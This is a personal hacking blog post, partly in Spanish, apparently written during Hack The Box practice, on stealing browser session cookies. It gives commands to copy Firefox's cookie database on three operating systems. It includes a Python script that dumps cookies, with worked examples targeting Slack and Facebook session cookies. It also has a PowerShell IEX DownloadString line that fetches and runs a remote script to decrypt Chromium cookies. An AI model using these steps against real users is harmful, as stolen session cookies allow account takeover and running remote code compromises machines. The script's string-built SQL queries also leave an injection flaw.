Cookie Extraction

Firefox

En windows: copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
En ubuntu: cp ~/.mozilla/firefox/*.default-release/cookies.sqlite .
En mac os: cp ~/Library/Application\ Support/Firefox/Profiles/*.default-release/cookies.sqlite .

#!/usr/bin/env python3
# Sample Script to extract cookies offile from FireFox sqlite database 
# Created by PlainText 

import argparse
import sqlite3

def main(dbpath, host, cookie):
	conn = sqlite3.connect(dbpath)
	cursor = conn.cursor()

	if (host == "" and cookie == ""):
		query = "SELECT * FROM moz_cookies"
	elif (host != "" and cookie == ""):
		query = "SELECT * FROM moz_cookies WHERE host LIKE '%{}%'".format(host)
	elif (host == "" and cookie != ""):
		query = "SELECT * FROM moz_cookies WHERE name LIKE '%{}%'".format(cookie)
	elif (host != "" and cookie != ""):
		query = "SELECT * FROM moz_cookies WHERE name LIKE '%{}%' AND host LIKE '%{}%'".format(cookie, host)

	cursor.execute(query)
	records = cursor.fetchall()
	rowCount = len(records) 

	if (rowCount > 0):
		for row in records:
			print(row)
	else:
		print("[-] No cookie found with the selected options.")

	conn.close()

if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("--dbpath", "-d", required=True, help="The path to the sqlite cookies database")
	parser.add_argument("--host", "-o", required=False, help="The host for the cookie", default="")
	parser.add_argument("--cookie", "-c", required=False, help="The name of the cookie", default="")
	args = parser.parse_args()
	main(args.dbpath, args.host, args.cookie)

Ejemplo de extracción de cookies

Ejemplo con slack:
- $ python3 cookieextractor.py --dbpath /home/kali/Desktop/htb/cookies.sqlite --host slack --cookie d
Ejemplo con facebook:
- $ python3 cookieextractor.py --dbpath /home/kali/Desktop/htb/cookies.sqlite --host facebook --cookie c_user
Ejemplo con todas las cookies:
- $ python3 cookieextractor.py --dbpath /home/kali/Desktop/htb/cookies.sqlite

Chromium-based browsers

La diferencia entre firefox y chromium es que los valores de las cookies en chromium están encriptados.
Para conseguir los valores podemos utilizar SharpChromium
- SharpChromium
- También existe una versión de powershell de este proyecto Invoke-SharpChromium
- IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
- Invoke-SharpChromium -Command "cookies slack.com"
- otro ejemplo: Invoke-SharpChromium -Command "cookies facebook.com"
Para compilar el proyecto se necesita visual studio IDE + .NET instalado, CTRL + SHIFT + B para compilar
En la carpeta del proyecto /bin/Debug se encuentra el ejecutable.

Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

Firefox

Ejemplo de extracción de cookies

Chromium-based browsers